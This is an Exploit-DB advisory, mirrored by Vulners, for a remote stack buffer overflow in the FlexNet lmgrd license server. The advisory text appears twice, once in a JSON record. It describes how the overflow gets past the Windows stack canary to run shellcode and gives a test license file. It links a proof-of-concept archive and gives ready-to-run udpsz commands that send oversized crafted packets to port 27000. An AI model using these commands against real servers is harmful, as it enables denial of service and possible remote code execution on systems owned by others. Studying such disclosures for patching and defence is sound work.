FlexNet License Server Manager Stack Overflow In lmgrd

Description

#######################################################################
Luigi Auriemma
Application: FlexNet License Server Manager
http://www.flexerasoftware.com/products/flexnet-publisher.htm
http://www.globes.com/support/fnp_utilities_download.htm
Versions: &lt;= 11.9.1 and others earlier (this version number was
written when I found the advisory many months/years ago)
Platforms: AIX, HP-UX, Linux, Mac OSX, Windows, SGI, Solaris
Bug: stack overflow in lmgrd
Exploitation: remote, versus server
Date: found 26 Oct 2010
fixed 26 Mar 2012
advisory 13 May 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
"FlexNet Publisher software licensing makes it easy for software
vendors and high-tech manufacturers to manage, secure, enhance, and
grow market share through flexible pricing, packaging, licensing, and
protection of their software and SaaS offerings."
#######################################################################
======
2) Bug
======
lmgrd is a license server manager listening on port 27000 and usually
running as system service in the products of various vendors like IBM,
HP, Sybase, Citrix, VMWare, SolidWorks and so on, it's just the most
diffused licenses manager.
Exists also another version of the license server called lmadmin that
includes a web interface and is NOT vulnerable but it's not diffused as
lmgrd.
The server is affected by a classical stack buffer-overflow in the
function that copies the data received after the header in a buffer
smaller than the needeed bytes.
On Windows the code execution takes place after the exception in
"REP MOVSD" bypassing the "stack canary" protection.
For example on this platform [ESP+8] points exactly at the position
0x3718 of our data so we can place a jmp back and executing the
shellcode placed before this position.
For running the software is needed a license file so for testing the
things quickly create the folder c:\flexlm, put lmgrd.exe in it and
then create the file license.dat containing the following data and then
launch it (I suggest to use -z for launching it in foreground):
SERVER this_host ANY
VENDOR SYBASE
# The Sybase Software Asset Management License Server will not start unless
# one valid license is present. The following license is not used but will
# allow the License Server to start in the absence of any other licenses.
# Once you have generated served licenses for this License Server at SPDC
# you should remove this license file.
#
INCREMENT SYSAM_LICENSE_SERVER SYBASE 2.0 permanent 1 ISSUER="Sybase, \
Inc." ISSUED=14-feb-2007 NOTICE="License to allow the SySAM \
License Server to start in the absence of any other licenses." \
SN=12727 SIGN2="075C 3143 F443 BD70 9869 F180 9AF4 B011 3753 \
A310 510F 6497 6A91 6F8E BD04 11B4 811C B57C 83EB 8F69 F191 \
499C 2456 5033 B63C 3231 1D5D D269 B7E7 F77A"
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18877.zip
udpsz -D -T -C "2f 24 189d 4000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0x4000
or the max
udpsz -D -T -C "2f b7 1179 ffff 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0xffff
note that the 8bit value at offset 1 and the 16bit one at offset 2 are
checksums calculated respectively on the 20 bytes header and the rest
of the data so they must be set correctly in case of modifications to
the packet.
#######################################################################
======
4) Fix
======
Fixed.
#######################################################################

All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2017

Protected by

{"hash": "233a5c9b8710067bfb0804f4b3f6f8163dc70dfd011ce89a40f9cb3a77e130ba", "id": "EDB-ID:18877", "lastseen": "2016-02-02T10:36:43", "viewCount": 2, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/18877/", "description": "FlexNet License Server Manager Stack Overflow In lmgrd. Dos exploits for multiple platform", "title": "FlexNet License Server Manager Stack Overflow In lmgrd", "sourceData": "#######################################################################\r\n\r\n Luigi Auriemma\r\n\r\nApplication: FlexNet License Server Manager\r\n http://www.flexerasoftware.com/products/flexnet-publisher.htm\r\n http://www.globes.com/support/fnp_utilities_download.htm\r\nVersions: <= 11.9.1 and others earlier (this version number was\r\n written when I found the advisory many months/years ago)\r\nPlatforms: AIX, HP-UX, Linux, Mac OSX, Windows, SGI, Solaris\r\nBug: stack overflow in lmgrd\r\nExploitation: remote, versus server\r\nDate: found 26 Oct 2010\r\n fixed 26 Mar 2012\r\n advisory 13 May 2012\r\nAuthor: Luigi Auriemma\r\n e-mail: aluigi@autistici.org\r\n web: aluigi.org\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n1) Introduction\r\n2) Bug\r\n3) The Code\r\n4) Fix\r\n\r\n\r\n#######################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\n\r\n\"FlexNet Publisher software licensing makes it easy for software\r\nvendors and high-tech manufacturers to manage, secure, enhance, and\r\ngrow market share through flexible pricing, packaging, licensing, and\r\nprotection of their software and SaaS offerings.\"\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n2) Bug\r\n======\r\n\r\n\r\nlmgrd is a license server manager listening on port 27000 and usually\r\nrunning as system service in the products of various vendors like IBM,\r\nHP, Sybase, Citrix, VMWare, SolidWorks and so on, it's just the most\r\ndiffused licenses manager.\r\nExists also another version of the license server called lmadmin that\r\nincludes a web interface and is NOT vulnerable but it's not diffused as\r\nlmgrd.\r\n\r\nThe server is affected by a classical stack buffer-overflow in the\r\nfunction that copies the data received after the header in a buffer\r\nsmaller than the needeed bytes.\r\n\r\nOn Windows the code execution takes place after the exception in\r\n\"REP MOVSD\" bypassing the \"stack canary\" protection.\r\nFor example on this platform [ESP+8] points exactly at the position\r\n0x3718 of our data so we can place a jmp back and executing the\r\nshellcode placed before this position.\r\n\r\nFor running the software is needed a license file so for testing the\r\nthings quickly create the folder c:\\flexlm, put lmgrd.exe in it and\r\nthen create the file license.dat containing the following data and then\r\nlaunch it (I suggest to use -z for launching it in foreground):\r\n\r\nSERVER this_host ANY\r\nVENDOR SYBASE\r\n# The Sybase Software Asset Management License Server will not start unless\r\n# one valid license is present. The following license is not used but will\r\n# allow the License Server to start in the absence of any other licenses.\r\n# Once you have generated served licenses for this License Server at SPDC \r\n# you should remove this license file.\r\n#\r\nINCREMENT SYSAM_LICENSE_SERVER SYBASE 2.0 permanent 1 ISSUER=\"Sybase, \\\r\n\tInc.\" ISSUED=14-feb-2007 NOTICE=\"License to allow the SySAM \\\r\n\tLicense Server to start in the absence of any other licenses.\" \\\r\n\tSN=12727 SIGN2=\"075C 3143 F443 BD70 9869 F180 9AF4 B011 3753 \\\r\n\tA310 510F 6497 6A91 6F8E BD04 11B4 811C B57C 83EB 8F69 F191 \\\r\n\t499C 2456 5033 B63C 3231 1D5D D269 B7E7 F77A\"\r\n\r\n\r\n#######################################################################\r\n\r\n===========\r\n3) The Code\r\n===========\r\n\r\n\r\nhttp://aluigi.org/testz/udpsz.zip\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18877.zip\r\n\r\n udpsz -D -T -C \"2f 24 189d 4000 0000 0000 00000000 00000000 0000\" -b 0x61 SERVER 27000 0x4000\r\n\r\nor the max\r\n udpsz -D -T -C \"2f b7 1179 ffff 0000 0000 00000000 00000000 0000\" -b 0x61 SERVER 27000 0xffff\r\n\r\nnote that the 8bit value at offset 1 and the 16bit one at offset 2 are\r\nchecksums calculated respectively on the 20 bytes header and the rest\r\nof the data so they must be set correctly in case of modifications to\r\nthe packet.\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n4) Fix\r\n======\r\n\r\n\r\nFixed.\r\n\r\n\r\n#######################################################################", "objectVersion": "1.0", "cvelist": [], "published": "2012-05-14T00:00:00", "osvdbidlist": ["81899"], "references": [], "reporter": "Luigi Auriemma", "modified": "2012-05-14T00:00:00", "href": "https://www.exploit-db.com/exploits/18877/"}